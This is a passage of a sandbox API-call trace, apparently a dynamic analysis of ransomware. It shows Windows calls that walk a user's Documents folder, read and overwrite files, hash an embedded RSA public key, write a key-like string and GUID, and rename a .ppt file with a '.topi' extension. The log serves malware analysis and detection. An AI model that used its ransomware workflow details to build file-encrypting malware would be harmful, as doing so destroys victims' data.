hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.441] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.441] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.442] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e20 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb578 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.442] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.443] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x157c8, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x157c8, lpOverlapped=0x0) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.443] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x157cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.443] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.443] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.444] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.444] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.444] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.444] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.444] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.444] CloseHandle (hObject=0x6a8) returned 1 [0097.445] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x3134738 [0097.445] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e0) returned 0x31cf750 [0097.445] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0097.445] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\2s5WtO97I.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\8hehk9af gbepy7rj\\2s5wto97i.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\2s5WtO97I.ppt.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\8hehk9af gbepy7rj\\2s5wto97i.ppt.topi")) returned 1 [0097.446] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.446] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.446] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.447] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.447] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfca76030, ftCreationTime.dwHighDateTime=0x1d5c46b, ftLastAccessTime.dwLowDateTime=0x62771a0, ftLastAccessTime.dwHighDateTime=0x1d5bf43, ftLastWriteTime.dwLowDateTime=0x62771a0, ftLastWriteTime.dwHighDateTime=0x1d5bf43, nFileSizeHigh=0x0, nFileSizeLow=0xbfef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7PbuEtvt0tlm9r.xls", cAlternateFileName="7PBUET~1.XLS")) returned 1 [0097.447] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.447] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x106) returned 0x31919a8 [0097.447] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.447] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\7PbuEtvt0tlm9r.xls") returned=".xls" [0097.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\7PbuEtvt0tlm9r.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\8hehk9af gbepy7rj\\7pbuetvt0tlm9r.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.448] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=49135) returned 1 [0097.448] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.451] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xbfc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.451] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.451] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.451] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.452] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xbfef, lpOverlapped=0x0) returned 1 [0097.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.452] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0097.453] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.453] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.453] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.453] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.453] GetLastError () returned 0x0 [0097.453] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.453] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0097.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.453] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.453] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.454] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbff0) returned 0x9a06a00 [0097.454] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb578 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e20 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb5c0 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e38 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e68 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e80 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.454] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e80 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4e68 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x3191ac0 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.455] GetCurrentThreadId () returned 0x8c4 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9ad0 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0097.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.456] GetCurrentThreadId () returned 0x8c4 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e68 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e80 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e50 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.457] 